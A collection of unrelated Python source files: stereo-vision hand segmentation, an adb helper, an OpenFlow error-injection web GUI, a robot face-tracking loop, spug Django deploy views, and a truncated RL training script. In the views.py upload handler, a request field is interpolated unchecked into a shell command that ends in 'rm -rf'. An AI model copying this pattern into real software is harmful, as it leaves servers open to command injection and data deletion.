disp = compute_disparity(dstL, dstR, stereo_matcher)
# Apply colormap to disparity
disp_color = cv2.applyColorMap(disp, cv2.COLORMAP_PLASMA)
# Stack resized frames and disparity map and display them
disp_tune = np.hstack((dstL, disp_color))
cv2.imshow(window_label, disp_tune)
# If 'q' is pressed, exit and return parameters
if cv2.waitKey(1) & 0xFF == ord("q"):
disp_params = {
"MDS": MDS,
"NOD": NOD,
"SWS": SWS,
"D12MD": D12MD,
"UR": UR,
"SPWS": SPWS,
"SR": SR,
"PFC": PFC,
"M": M,
}
break
cv2.destroyAllWindows()
self._set_disp_params(disp_params)
self._save_disp_params(disp_file)
print("Disparity parameters saved to file")
def realtime_disp_map(self):
"""Displays a real-time disparity map"""
print("Displaying real-time disparity map...")
# Reset disparity bounds
self._disp_bounds = [np.inf, -np.inf]
# Load calibration and disparity data
if not self._is_calibrated:
raise MissingParametersError("Calibration")
if not self._has_disparity_params:
raise MissingParametersError("Disparity")
P1 = 8 * 3 * self._disp_params["SWS"] ** 2
P2 = 32 * 3 * self._disp_params["SWS"] ** 2
# Create and configure left and right stereo matchers
stereo_matcher = cv2.StereoSGBM_create(
minDisparity=self._disp_params["MDS"],
numDisparities=self._disp_params["NOD"],
blockSize=self._disp_params["SWS"],
P1=P1,
P2=P2,
disp12MaxDiff=self._disp_params["D12MD"],
uniquenessRatio=self._disp_params["UR"],
speckleWindowSize=self._disp_params["SPWS"],
speckleRange=self._disp_params["SR"],
preFilterCap=self._disp_params["PFC"],
mode=self._disp_params["M"],
)
# Compute valid ROI
# valid_ROI = cv2.getValidDisparityROI(roi1=tuple(self._calib_params['valid_ROIL']),
# roi2=tuple(self._calib_params['valid_ROIR']),
# minDisparity=self._disp_params['MDS'],
# numberOfDisparities=self._disp_params['NOD'],
# blockSize=self._disp_params['SWS'])
# Define skin color bounds in YCbCr color space
skin_lower = np.array([0, 133, 77], dtype=np.uint8)
skin_upper = np.array([255, 173, 127], dtype=np.uint8)
# Wait for ready signal from sensors
sigL, sigR = self.multicast_recv_sig()
print(f"Left sensor: {sigL}")
print(f"Right sensor: {sigR}")
print("Both sensors are ready")
# Synchronize sensors with a start signal
self.multicast_send_sig(b"START")
self._create_io_threads()
while True:
# Get frames from both cameras and apply sensor corrections
try:
frameL, frameR = self._read_stereo_frames()
except OutOfSyncError as e:
print(
f"\nThe two sensors are out of sync of {e.delay:3f} s and must be restarted."
)
self._reset_sensors()
continue
dstL, dstR = self.undistort_rectify(frameL, frameR)
# Crop frames to valid ROI
# x, y, w, h = valid_ROI
# dstL = dstL[y:y + h, x:x + w]
# dstR = dstR[y:y + h, x:x + w]
# Compute disparity map
disp = compute_disparity(dstL, dstR, stereo_matcher, self._disp_bounds)
# Apply colormap to disparity
disp_color = cv2.applyColorMap(disp, cv2.COLORMAP_PLASMA)
# Segment hand
# Step 1: threshold disparity map
_, disp_mask = cv2.threshold(disp, 191, 255, cv2.THRESH_BINARY)
# Step 2: convert frame to YCbCr color space and segment pixels in the given range
converted = cv2.cvtColor(dstL, cv2.COLOR_BGR2YCrCb)
skin_mask = cv2.inRange(converted, skin_lower, skin_upper)
# Step 3: apply both masks to the frame
mask = np.bitwise_and(skin_mask, disp_mask)
hand = cv2.bitwise_and(
dstL.astype(np.uint8), dstL.astype(np.uint8), mask=mask
)
hand_disp = cv2.bitwise_and(disp, disp, mask=mask)
# Step 4: apply close operator to refine the segmented image
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5))
hand = cv2.morphologyEx(hand, cv2.MORPH_CLOSE, kernel)
hand_disp = cv2.morphologyEx(hand_disp, cv2.MORPH_CLOSE, kernel)
# Get depth information from disparity map
hand_depth = cv2.reprojectImageTo3D(
hand_disp,
Q=self._calib_params["disp_to_depth_mtx"],
handleMissingValues=True,
)
# TODO: insert ML algorithm here
# Display frames and disparity maps
frames = np.hstack((dstL, dstR))
cv2.imshow("Left and right frame", frames)
cv2.imshow(
"Disparity",
np.hstack(
(np.repeat(np.expand_dims(disp, axis=-1), 3, axis=-1), disp_color)
),
)
cv2.imshow(
"Hand",
np.hstack(
(hand, np.repeat(np.expand_dims(hand_disp, axis=-1), 3, axis=-1))
),
)
# When 'q' is pressed, save current frames and disparity maps to file and break the loop
if cv2.waitKey(1) & 0xFF == ord("q"):
print(type(hand_depth))
print(hand_depth.shape)
self.multicast_send_sig(b"STOP")
self._kill_io_threads()
break
cv2.destroyAllWindows()
print("Streaming ended.")
|
adbutil.py
|
import subprocess
import re
import threading
ATRACE_PATH="/android/catapult/systrace/systrace/systrace.py"
class AdbError(RuntimeError):
def __init__(self, arg):
self.args = (arg,)
def am(serial, cmd, args):
if not isinstance(args, list):
args = [args]
full_args = ["am"] + [cmd] + args
__call_adb(serial, full_args, False)
def pm(serial, cmd, args):
if not isinstance(args, list):
args = [args]
full_args = ["pm"] + [cmd] + args
__call_adb(serial, full_args, False)
def dumpsys(serial, topic):
return __call_adb(serial, ["dumpsys"] + [topic], True)
def trace(serial,
tags = ["gfx", "sched", "view", "freq", "am", "wm", "power", "load", "memreclaim"],
time = "10"):
args = [ATRACE_PATH, "-e", serial, "-t" + time, "-b32768"] + tags
subprocess.call(args)
def wake(serial):
output = dumpsys(serial, "power")
wakefulness = re.search('mWakefulness=([a-zA-Z]+)', output)
if wakefulness.group(1) != "Awake":
__call_adb(serial, ["input", "keyevent", "KEYCODE_POWER"], False)
def root(serial):
subprocess.call(["adb", "-s", serial, "root"])
def pull(serial, path, dest):
subprocess.call(["adb", "-s", serial, "wait-for-device", "pull"] + [path] + [dest])
def shell(serial, cmd):
__call_adb(serial, cmd, False)
def track_logcat(serial, awaited_string, callback):
threading.Thread(target=__track_logcat, name=serial + "-waiter", args=(serial, awaited_string, callback)).start()
def __call_adb(serial, args, block):
full_args = ["adb", "-s", serial, "wait-for-device", "shell"] + args
print full_args
output = None
try:
if block:
output = subprocess.check_output(full_args)
else:
subprocess.call(full_args)
except subprocess.CalledProcessError:
raise AdbError("Error calling " + " ".join(args))
return output
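# Note: track_logcat() above references __track_logcat, which was missing from this
# file. A minimal sketch is given below; it assumes line-oriented 'adb logcat' output
# and that 'callback' takes no arguments -- adapt the invocation to the real signature.
def __track_logcat(serial, awaited_string, callback):
    logcat = subprocess.Popen(["adb", "-s", serial, "logcat"], stdout=subprocess.PIPE)
    try:
        for line in iter(logcat.stdout.readline, ""):
            if awaited_string in line:
                callback()
                break
    finally:
        logcat.terminate()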
|
gui-web.py
|
#!/usr/bin/env python
import sys, argparse, threading, time, math, random, json, os
import SimpleHTTPServer, SocketServer, Queue
import pylibopenflow.openflow as openflow
import pylibopenflow.output as output
import pylibopenflow.of.msg as of_msg
import pylibopenflow.of.simu as of_simu
from pinpoint import Pinpointer
class StanfordTopo:
"Topology for Stanford backbone"
PORT_ID_MULTIPLIER = 1
INTERMEDIATE_PORT_TYPE_CONST = 1
OUTPUT_PORT_TYPE_CONST = 2
PORT_TYPE_MULTIPLIER = 10000
SWITCH_ID_MULTIPLIER = 100000
DUMMY_SWITCH_BASE = 1000
PORT_MAP_FILENAME = "data/stanford/port_map.txt"
TOPO_FILENAME = "data/stanford/backbone_topology.tf"
dummy_switches = set()
def __init__( self ):
# Read topology info
self.switch_id_to_name = {}
self.ports = self.load_ports(self.PORT_MAP_FILENAME)
self.links = self.load_topology(self.TOPO_FILENAME)
self.switches = self.ports.keys()
self.switch_name_to_errors = {}
self.link_id_to_errors = {}
def load_ports(self, filename):
ports = {}
f = open(filename, 'r')
for line in f:
if line.startswith("$"):
switch_name = line[1:].strip()
stored = False
elif not line.startswith("$") and line != "":
tokens = line.strip().split(":")
port_flat = int(tokens[1])
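# Flat port ids pack the switch id in the high digits (divide by SWITCH_ID_MULTIPLIER)
# and the port number in the low digits (modulo PORT_TYPE_MULTIPLIER).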
dpid = port_flat / self.SWITCH_ID_MULTIPLIER
port = port_flat % self.PORT_TYPE_MULTIPLIER
if dpid not in ports.keys():
ports[dpid] = set()
if port not in ports[dpid]:
ports[dpid].add(port)
if not stored:
self.switch_id_to_name[dpid] = switch_name
stored = True
f.close()
return ports
def load_topology(self, filename):
links = set()
f = open(filename, 'r')
for line in f:
if line.startswith("link"):
tokens = line.split('$')
src_port_flat = int(tokens[1].strip('[]').split(', ')[0])
dst_port_flat = int(tokens[7].strip('[]').split(', ')[0])
link_id = tokens[-2]
links.add((src_port_flat, dst_port_flat, link_id))
f.close()
return links
def dump_json(self, filename):
topo = StanfordTopo()
nodes = []
links = []
for (src_port, dst_port, link_id) in topo.links:
if link_id not in self.link_id_to_errors.keys():
self.link_id_to_errors[link_id] = False
if self.link_id_to_errors[link_id]:
links.append({"source": src_port / topo.SWITCH_ID_MULTIPLIER - 1,
"target":dst_port / topo.SWITCH_ID_MULTIPLIER - 1,
"value": 1,
"problems": 1,
"name" : link_id
})
else:
links.append({"source": src_port / topo.SWITCH_ID_MULTIPLIER - 1,
"target":dst_port / topo.SWITCH_ID_MULTIPLIER - 1,
"value": 1,
"name" : link_id
})
for index in xrange(0, len(topo.switch_id_to_name.keys())):
switch_name = topo.switch_id_to_name[index+1]
if switch_name not in self.switch_name_to_errors.keys():
self.switch_name_to_errors[switch_name] = []
if switch_name.startswith("bbr"):
group = 0
else:
group = 1
if not self.switch_name_to_errors[switch_name] == []:
problems = self.switch_name_to_errors[switch_name]
json_string = "$".join(problems)
json_string = json_string.replace('\r', '').replace('\n', '')
nodes.append({"name":switch_name,"group":group, "problems":json_string} )
else:
nodes.append({"name":switch_name,"group":group} )
json_object = {"nodes":nodes,"links":links}
f = open(filename,'w')
json.dump(json_object, f)
f.close()
def inject_errors(self, error_rules):
# error_rules is a set of error rule ids
p = Pinpointer()
for rule in error_rules:
tokens = rule.split("_")
if rule not in self.switch_name_to_errors["_".join(tokens[0:2])]:
self.switch_name_to_errors["_".join(tokens[0:2])].extend(p.get_config_lines(rule))
def remove_errors(self, error_rules):
p = Pinpointer()
for rule in error_rules:
tokens = rule.split("_")
lines = p.get_config_lines(rule)
for line in lines:
try:
self.switch_name_to_errors["_".join(tokens[0:2])].remove(line)
except (KeyError, ValueError):
pass
def inject_link_errors(self, error_rules):
for rule in error_rules:
self.link_id_to_errors[rule] = True
def remove_link_errors(self, error_rules):
for rule in error_rules:
try:
self.link_id_to_errors[rule] = False
except:
pass
def clear_errors(self):
for switch in self.switch_name_to_errors.keys():
self.switch_name_to_errors[switch] = []
for link_id in self.link_id_to_errors.keys():
self.link_id_to_errors[link_id] = False
class DemoHTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path.startswith("/web/data"):
last_time = os.path.getmtime('.' + self.path)
elapse = time.time() - last_time
if elapse > 5:
self.send_response(304)
self.end_headers()
return
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
if self.path.startswith("/web/inject"):
self.do_inject_external()
elif self.path.startswith("/web/reset"):
self.do_reset_external()
elif self.path.startswith("/web/detect"):
self.do_detect_external()
self.send_response(200)
self.end_headers()
def do_inject_external(self):
pass
def do_reset_external(self):
pass
def do_detect_external(self):
pass
class TCPServer(SocketServer.TCPServer):
allow_reuse_address = True
class Application:
CONTROLLER_DPID = 0xCAFECAFE
def main(self):
# Start the periodic call in the GUI to check if the queue contains
# anything
try:
while True:
self.processOF()
self.processError()
time.sleep(1)
except KeyboardInterrupt:
# Stop Thread 1
self.running = False
# Stop Thread 3
self.httpd.shutdown()
return -1
def __init__(self, controller='localhost', port=6633):
self.controller = controller
self.port = port
self.received_packet_count = 0
self.topology_real = StanfordTopo()
self.topology_discovered = StanfordTopo()
self.pinpointer = Pinpointer()
# Content: String!
self.queue_GUI_to_OF = Queue.Queue()
# Content: OF message!
self.queue_OF_to_GUI = Queue.Queue()
self.running = True
# Thread 1: OF thread
self.thread1 = threading.Thread(target=self.connectToController)
#self.thread1.start()
# Thread 2: Connect to run pinpointer
self.errors = []
self.test_packets = []
self.queue_pinpoint_to_GUI = Queue.Queue()
self.thread2 = None
# Thread 3: WebServer
DemoHTTPHandler.do_inject_external = self.do_inject
DemoHTTPHandler.do_reset_external = self.do_reset
DemoHTTPHandler.do_detect_external = self.do_detect
self.httpd = TCPServer(("", 8000), DemoHTTPHandler)
self.thread3 = threading.Thread(target=self.httpd.serve_forever)
self.thread3.start()
self.draw_callback(None)
def do_inject(self):
self.inject_callback(None)
def do_reset(self):
self.topology_real.clear_errors()
self.topology_discovered.clear_errors()
self.topology_real.dump_json("web/data/data.json")
self.topology_discovered.dump_json("web/data/dataDiscovered.json")
def do_detect(self):
if self.errors != []:
self.thread2 = threading.Thread(target=self.pinpoint, args=(self.test_packets, self.errors))
self.thread2.start()
self.errors = []
else:
# Touch!
self.topology_discovered.dump_json("web/data/dataDiscovered.json")
def submit_callback(self, widget, entry):
packet = entry.get_text()
self.send_packet(packet)
def draw_callback(self, widget):
self.topology_real.dump_json("web/data/data.json")
self.topology_discovered.dump_json("web/data/dataDiscovered.json")
def inject_callback(self, widget):
self.topology_real.clear_errors()
self.topology_discovered.clear_errors()
test_packets, errors = self.pinpointer.generate_test_case(1)
self.errors = errors
self.test_packets = test_packets
link_errors = []
device_errors = []
for error in errors:
if error.startswith("_"):
link_errors.append(error)
else:
device_errors.append(error)
self.topology_real.inject_errors(device_errors)
self.topology_real.inject_link_errors(link_errors)
self.topology_real.dump_json("web/data/data.json")
#self.thread2 = threading.Thread(target=self.pinpoint, args=(test_packets, errors))
#self.thread2.start()
def send_packet(self, packet="Hello, World!\n"):
self.queue_GUI_to_OF.put(packet)
def processOF(self):
while not self.queue_OF_to_GUI.empty():
msg = self.queue_OF_to_GUI.get()
self.msgCallback(msg)
if not self.running:
sys.exit(1)
return True
def processError(self):
if self.queue_pinpoint_to_GUI.empty():
return True
link_errors = []
device_errors = []
errors = self.queue_pinpoint_to_GUI.get()
for error in errors:
if error.startswith("_"):
link_errors.append(error)
else:
device_errors.append(error)
self.topology_discovered.inject_errors(device_errors)
self.topology_discovered.inject_link_errors(link_errors)
self.topology_discovered.dump_json("web/data/dataDiscovered.json")
return True
def connectToController(self):
#Connect to controller
ofmsg = openflow.messages()
ofparser = of_msg.parser(ofmsg)
ofsw = of_simu.switch(ofmsg, self.controller, self.port,
dpid=self.CONTROLLER_DPID,
parser=ofparser)
ofsw.send_hello()
while self.running:
msg = ofsw.connection.msgreceive(blocking=False)
# OF to GUI
if msg != None:
ofsw.receive_openflow(msg)
self.queue_OF_to_GUI.put(msg)
# GUI to OF
while not self.queue_GUI_to_OF.empty():
packet = self.queue_GUI_to_OF.get()
ofsw.send_packet(inport=0, packet=packet)
time.sleep(0.1)
def pinpoint(self, test_packets, errors):
errors = self.pinpointer.pin_point_test ( test_packets, errors )
print "Fuck!!"
self.queue_pinpoint_to_GUI.put(errors)
def main():
parser = argparse.ArgumentParser(description='Python backend to communicate with Beacon', epilog="Report any bugs to hyzeng@stanford.edu")
parser.add_argument('--controller', '-c', dest='controller', default="localhost")
parser.add_argument('--port', '-p', dest='port', default=6633)
parser.add_argument('--verbose', '-v', dest='verbose', action='count')
args = parser.parse_args()
port = args.port
controller = args.controller
if args.verbose == None:
output.set_mode("INFO")
else:
output.set_mode("DBG")
# Main Loop here
app = Application(controller=controller, port=port)
app.main()
if __name__ == '__main__':
main()
|
Main.py
|
from help_modules import *
from motor_control import *
import pyaudio
import wave
import numpy as np
import time
import matplotlib.pyplot as plt
import speech_recognition as sr
from scipy import signal
import math
import threading
import multiprocessing as ms
import os
import sys  # sys.exit() is used in the main loop below
import cv2
from nanpy import (ArduinoApi, SerialManager)
import dlib
import pygame
### configure TTS ###
def speak(audio_file_name):
pygame.mixer.init(16500)
pygame.mixer.music.load(audio_file_name)
pygame.mixer.music.play()
#while pygame.mixer.music.get_busy() == True:
#continue
P_GAIN, I_GAIN, D_GAIN = 0.025,0.00000001,0.001
###Configuring face detector###
detector = dlib.get_frontal_face_detector()
###Configuring Video ###
vs = cv2.VideoCapture(0)
w,h=260,195
### Configuring Audio###
r = sr.Recognizer()
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
CHUNK = 2048
SPEAKING_THRESH = 0.8
WAVE_OUTPUT_FILENAME = "file.wav"
DEVICE_INDEX = get_audio_device()
frame=np.zeros((480,360))
frames = [0] * 5000
frames_l = [0] * 5000
frames_r = [0] * 5000
times = [0] * 5000
data=0
audio = pyaudio.PyAudio()
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True,
input_device_index=DEVICE_INDEX,
frames_per_buffer=CHUNK)
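# record_audio() runs in a background thread and keeps a rolling window of the most
# recent audio chunks together with their capture timestamps, so the recognition and
# sound-localization code can slice out the interval in which speech was detected.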
def record_audio():
global CHUNK
global data
global times
while True:
data = stream.read(CHUNK)
frames.append(data)
frames.pop(0)
times.append(time.time())
times.pop(0)
audio_capture = threading.Thread(target=record_audio)
audio_capture.start()
time.sleep(2)
###data,frame are always available for any calculation###
det=""
make_contact=0
def speech_rec():
global det
global data
global SPEAKING_THRESH
global make_contact
t1 = time.time()
start_time = t1
stopped_time = t1
while True:
if is_speaking(data, SPEAKING_THRESH):
if (time.time() - t1) > 1:
start_time = time.time() - 1
t1 = time.time()
else:
t2 = time.time()
if (t2 - t1) > 1 and t1 > stopped_time:
stopped_time = t2 + 0.5
start_index = (np.abs(np.array(times) - start_time)).argmin()
stop_index = (np.abs(np.array(times) - stopped_time)).argmin()
mic_l, mic_r = get_corresponding_mic_data(frames, start_index, stop_index)
save_audio(frames[start_index:stop_index],audio,WAVE_OUTPUT_FILENAME,CHANNELS,FORMAT,RATE)
det = recognize(sr,r,WAVE_OUTPUT_FILENAME)
print(det)
if "hello Amigo" in det:
lag, lags, corr = lag_finder(mic_l, mic_r, 44100)
lag = lag * 1000000 / RATE#microseconds
angle = find_angle(lag/1000000, 9, 36750)
print("angle: ",angle)
move_neck(angle)
make_contact=1
speak("Audio/hello.wav")
if "bye" in det:
speak("Audio/bye.wav")
make_contact=0
reset_motors()
speech_reco = threading.Thread(target=speech_rec)
speech_reco.start()
def get_video_info():
_,frame = vs.read()
frame = cv2.resize(frame, (w,h))
x1, y1, x2, y2 = detect_face(detector, frame)
try:
frame = cv2.rectangle(frame, (x1,y1), (x2,y2), (255,0,0), 1)
except Exception:
pass  # face not detected or invalid coordinates: keep the unannotated frame
return frame,x1,y1,x2,y2
while True:
not_detected = 0
frame,x1,y1,x2,y2= get_video_info()
if "hello Amigo" in det:
t0=time.time()
Ix_old,errorx_old,Iy_old,errory_old = 0,0,0,0
while not_detected<100:
frame,x1,y1,x2,y2= get_video_info()
#cv2.imshow("vision",frame)
key = cv2.waitKey(1)& 0xFF
if key == ord("q"):
vs.release()
cv2.destroyAllWindows()
sys.exit()
break
if x1 is not None and make_contact == 1:
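# A face was found: steer the pan/tilt servos toward the face centre with a PID loop.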
fx=x1+(x2-x1)/2
fy=y1+(y2-y1)/2
t1=time.time()
dt=t1-t0
pidx, pidy,errorx_old,Ix_old,errory_old,Iy_old = pid_cal(w/2,h/2,fx,fy,dt,Ix_old,errorx_old,Iy_old,errory_old, P_GAIN, I_GAIN, D_GAIN)
change_servox(pidx)
change_servoy(-pidy)
t0=t1
not_detected=0
if "bye" in det:
speak("Audio/bye.wav")
det=""
make_contact = 0
reset_motors()
if "company close" in det or "closing time" in det:
speak("Audio/close_time.wav")
det=""
else:
not_detected=not_detected+1
print("Face not detected..")
make_contact=0
reset_motors()
det =""
#cv2.imshow("vision",frame)
key = cv2.waitKey(1)& 0xFF
if key == ord("q"):
vs.release()
cv2.destroyAllWindows()
sys.exit()
break
|
views.py
|
# Copyright: (c) OpenSpug Organization. https://github.com/openspug/spug
# Copyright: (c) <spug.dev@gmail.com>
# Released under the AGPL-3.0 License.
from django.views.generic import View
from django.db.models import F
from django.conf import settings
from django.http.response import HttpResponseBadRequest
from django_redis import get_redis_connection
from libs import json_response, JsonParser, Argument, human_datetime, human_time
from apps.deploy.models import DeployRequest
from apps.app.models import Deploy, DeployExtend2
from apps.deploy.utils import deploy_dispatch, Helper
from apps.host.models import Host
from collections import defaultdict
from threading import Thread
from datetime import datetime
import subprocess
import json
import uuid
import os
class RequestView(View):
def get(self, request):
data, query = [], {}
if not request.user.is_supper:
perms = request.user.deploy_perms
query['deploy__app_id__in'] = perms['apps']
query['deploy__env_id__in'] = perms['envs']
for item in DeployRequest.objects.filter(**query).annotate(
env_id=F('deploy__env_id'),
env_name=F('deploy__env__name'),
app_id=F('deploy__app_id'),
app_name=F('deploy__app__name'),
app_host_ids=F('deploy__host_ids'),
app_extend=F('deploy__extend'),
created_by_user=F('created_by__nickname')):
tmp = item.to_dict()
tmp['env_id'] = item.env_id
tmp['env_name'] = item.env_name
tmp['app_id'] = item.app_id
tmp['app_name'] = item.app_name
tmp['app_extend'] = item.app_extend
tmp['extra'] = json.loads(item.extra)
tmp['host_ids'] = json.loads(item.host_ids)
tmp['app_host_ids'] = json.loads(item.app_host_ids)
tmp['status_alias'] = item.get_status_display()
tmp['created_by_user'] = item.created_by_user
data.append(tmp)
return json_response(data)
def post(self, request):
form, error = JsonParser(
Argument('id', type=int, required=False),
Argument('deploy_id', type=int, help='缺少必要参数'),
Argument('name', help='请输入申请标题'),
Argument('extra', type=list, help='缺少必要参数'),
Argument('host_ids', type=list, filter=lambda x: len(x), help='请选择要部署的主机'),
Argument('desc', required=False),
).parse(request.body)
if error is None:
deploy = Deploy.objects.filter(pk=form.deploy_id).first()
if not deploy:
return json_response(error='未找到该发布配置')
if form.extra[0] == 'tag' and not form.extra[1]:
return json_response(error='请选择要发布的Tag')
if form.extra[0] == 'branch' and not form.extra[2]:
return json_response(error='请选择要发布的分支及Commit ID')
if deploy.extend == '2':
if form.extra[0]:
form.extra[0] = form.extra[0].replace("'", '')
if DeployExtend2.objects.filter(deploy=deploy, host_actions__contains='"src_mode": "1"').exists():
if len(form.extra) < 2:
return json_response(error='该应用的发布配置中使用了数据传输动作且设置为发布时上传,请上传要传输的数据')
form.version = form.extra[1].get('path')
form.name = form.name.replace("'", '')
form.status = '0' if deploy.is_audit else '1'
form.extra = json.dumps(form.extra)
form.host_ids = json.dumps(form.host_ids)
if form.id:
req = DeployRequest.objects.get(pk=form.id)
is_required_notify = deploy.is_audit and req.status == '-1'
DeployRequest.objects.filter(pk=form.id).update(
created_by=request.user,
reason=None,
**form
)
else:
req = DeployRequest.objects.create(created_by=request.user, **form)
is_required_notify = deploy.is_audit
if is_required_notify:
Thread(target=Helper.send_deploy_notify, args=(req, 'approve_req')).start()
return json_response(error=error)
def put(self, request):
form, error = JsonParser(
Argument('id', type=int, help='缺少必要参数'),
Argument('action', filter=lambda x: x in ('check', 'do'), help='参数错误')
).parse(request.body)
if error is None:
req = DeployRequest.objects.filter(pk=form.id).first()
if not req:
return json_response(error='未找到指定发布申请')
pre_req = DeployRequest.objects.filter(
deploy_id=req.deploy_id,
type='1',
id__lt=req.id,
version__isnull=False).first()
if not pre_req:
return json_response(error='未找到该应用可以用于回滚的版本')
if form.action == 'check':
return json_response({'date': pre_req.created_at, 'name': pre_req.name})
DeployRequest.objects.create(
deploy_id=req.deploy_id,
name=f'{req.name} - 回滚',
type='2',
extra=pre_req.extra,
host_ids=req.host_ids,
status='0' if pre_req.deploy.is_audit else '1',
desc='自动回滚至该应用的上个版本',
version=pre_req.version,
created_by=request.user
)
return json_response(error=error)
def delete(self, request):
form, error = JsonParser(
Argument('id', type=int, required=False),
Argument('expire', required=False),
Argument('count', type=int, required=False, help='请输入数字')
).parse(request.GET)
if error is None:
rds = get_redis_connection()
if form.id:
DeployRequest.objects.filter(pk=form.id, status__in=('0', '1', '-1')).delete()
return json_response()
elif form.count:
if form.count < 1:
return json_response(error='请输入正确的保留数量')
counter, ids = defaultdict(int), []
for item in DeployRequest.objects.all():
if counter[item.deploy_id] == form.count:
ids.append(item.id)
else:
counter[item.deploy_id] += 1
count, _ = DeployRequest.objects.filter(id__in=ids).delete()
if ids:
rds.delete(*(f'{settings.REQUEST_KEY}:{x}' for x in ids))
return json_response(count)
elif form.expire:
requests = DeployRequest.objects.filter(created_at__lt=form.expire)
ids = [x.id for x in requests]
count, _ = requests.delete()
if ids:
rds.delete(*(f'{settings.REQUEST_KEY}:{x}' for x in ids))
return json_response(count)
else:
return json_response(error='请至少使用一个删除条件')
return json_response(error=error)
class RequestDetailView(View):
def get(self, request, r_id):
req = DeployRequest.objects.filter(pk=r_id).first()
if not req:
return json_response(error='未找到指定发布申请')
hosts = Host.objects.filter(id__in=json.loads(req.host_ids))
targets = [{'id': x.id, 'title': f'{x.name}({x.hostname}:{x.port})'} for x in hosts]
server_actions, host_actions, outputs = [], [], []
if req.deploy.extend == '2':
server_actions = json.loads(req.deploy.extend_obj.server_actions)
host_actions = json.loads(req.deploy.extend_obj.host_actions)
if request.GET.get('log'):
rds, key, counter = get_redis_connection(), f'{settings.REQUEST_KEY}:{r_id}', 0
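# Page through the Redis list ten entries at a time until it is exhausted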
data = rds.lrange(key, counter, counter + 9)
while data:
counter += 10
outputs.extend(x.decode() for x in data)
data = rds.lrange(key, counter, counter + 9)
return json_response({
'app_name': req.deploy.app.name,
'env_name': req.deploy.env.name,
'status': req.status,
'type': req.type,
'status_alias': req.get_status_display(),
'targets': targets,
'server_actions': server_actions,
'host_actions': host_actions,
'outputs': outputs
})
def post(self, request, r_id):
query = {'pk': r_id}
if not request.user.is_supper:
perms = request.user.deploy_perms
query['deploy__app_id__in'] = perms['apps']
query['deploy__env_id__in'] = perms['envs']
req = DeployRequest.objects.filter(**query).first()
if not req:
return json_response(error='未找到指定发布申请')
if req.status not in ('1', '-3'):
return json_response(error='该申请单当前状态还不能执行发布')
hosts = Host.objects.filter(id__in=json.loads(req.host_ids))
token = uuid.uuid4().hex
outputs = {str(x.id): {'data': []} for x in hosts}
outputs.update(local={'data': [f'{human_time()} 建立连接... ']})
req.status = '2'
req.do_at = human_datetime()
req.do_by = request.user
if not req.version:
req.version = f'{req.deploy_id}_{req.id}_{datetime.now().strftime("%Y%m%d%H%M%S")}'
req.save()
Thread(target=deploy_dispatch, args=(request, req, token)).start()
return json_response({'token': token, 'type': req.type, 'outputs': outputs})
def patch(self, request, r_id):
form, error = JsonParser(
Argument('reason', required=False),
Argument('is_pass', type=bool, help='参数错误')
).parse(request.body)
if error is None:
req = DeployRequest.objects.filter(pk=r_id).first()
if not req:
return json_response(error='未找到指定申请')
if not form.is_pass and not form.reason:
return json_response(error='请输入驳回原因')
if req.status != '0':
return json_response(error='该申请当前状态不允许审核')
req.approve_at = human_datetime()
req.approve_by = request.user
req.status = '1' if form.is_pass else '-1'
req.reason = form.reason
req.save()
Thread(target=Helper.send_deploy_notify, args=(req, 'approve_rst')).start()
return json_response(error=error)
def do_upload(request):
repos_dir = settings.REPOS_DIR
file = request.FILES['file']
deploy_id = request.POST.get('deploy_id')
if file and deploy_id:
dir_name = os.path.join(repos_dir, deploy_id)
file_name = datetime.now().strftime("%Y%m%d%H%M%S")
command = f'mkdir -p {dir_name} && cd {dir_name} && ls | sort -rn | tail -n +11 | xargs rm -rf'
code, outputs = subprocess.getstatusoutput(command)
if code != 0:
return json_response(error=outputs)
with open(os.path.join(dir_name, file_name), 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
return json_response(file_name)
else:
return HttpResponseBadRequest()
|
process_utils.py
|
from numpy.core.shape_base import stack
from RobotTask import RobotTask
import json
from scipy.signal.ltisys import StateSpace
from VisualTaskEnv import VisualTaskEnv
from isaac import *
import time
import numpy as np
from threading import Thread
from utils import *
import torch
from PyController import PyController
from nav_acl import Nav_ACL
from collections import deque
import copy
from Networks import *
def start_gather_experience(agent_index, shared_elements,config):
########## start isaac app #######################################
app = Application("apps/py_sac_nav_acl/py_sac_nav_acl.app.json")
isaac_thread = Thread(target=start_isaac_application,args=(app,agent_index,config,))
isaac_thread.start()
########### environment and algorithm setup ########################
time.sleep(1)
env = VisualTaskEnv(app,agent_index, "py_controller_"+str(agent_index),config)
torch.manual_seed((23345*agent_index))
np.random.seed((23345*agent_index))
env.seed((23345*agent_index))
########## run episodes ############################################
# run_test_episodes(env, agent_index,shared_elements,config,)
run_episodes(env, agent_index,shared_elements,config,)
app.stop()
def run_test_episodes(env, agent_index,shared_elements, config):
Full_Path = "/home/developer/Training_results/Visual/10/08/2021/16:05:00/"+"_CHECKPOINT_" + "4_19681"
Full_navn = "/home/developer/Training_results/Visual/10/08/2021/16:05:00/"+"_nav_acl_network_" + "4_19681"
No_AE_Path= "/home/developer/Training_results/Visual/10/05/2021/11:19:13/"+"_CHECKPOINT_" + "62_541207"
No_AE_navn= "/home/developer/Training_results/Visual/10/05/2021/11:19:13/"+"_nav_acl_network_" + "62_541207"
RND_Path = "/home/developer/Training_results/Visual/09/30/2021/09:44:53/"+"_CHECKPOINT_" + "22_162675"
RND_navn = "/home/developer/Training_results/Visual/09/30/2021/09:44:53/"+"_nav_acl_network_" + "22_162675"
nav_list = [Full_navn,No_AE_navn,RND_navn]
check_list = [Full_Path,No_AE_Path,RND_Path]
names_list = ["FULL", "No_AE", "RND"]
nav_acl_network = NavACLNetwork(5,config['nav_acl_hidden_dim']).to(train_device)
for model_index in range(len(names_list)):
print("load model: ", check_list[model_index])
checkpoint=torch.load(check_list[model_index])
print("load navacl model: ", nav_list[model_index])
nav_check =torch.load(nav_list[model_index])
nav_acl_network.load_state_dict(nav_check)
print("hat geklappt")
for model_index in range(len(names_list)):
checkpoint=torch.load(check_list[model_index])
nav_check =torch.load(nav_list[model_index])
nav_acl_network.load_state_dict(nav_check)
soft_q_net1 = SoftQNetwork(config).to(train_device)
soft_q_net1.load_state_dict(checkpoint['soft_q_net1'])
model_clone = PolicyNetwork(config)
model_clone.load_state_dict(checkpoint['policy_net'])
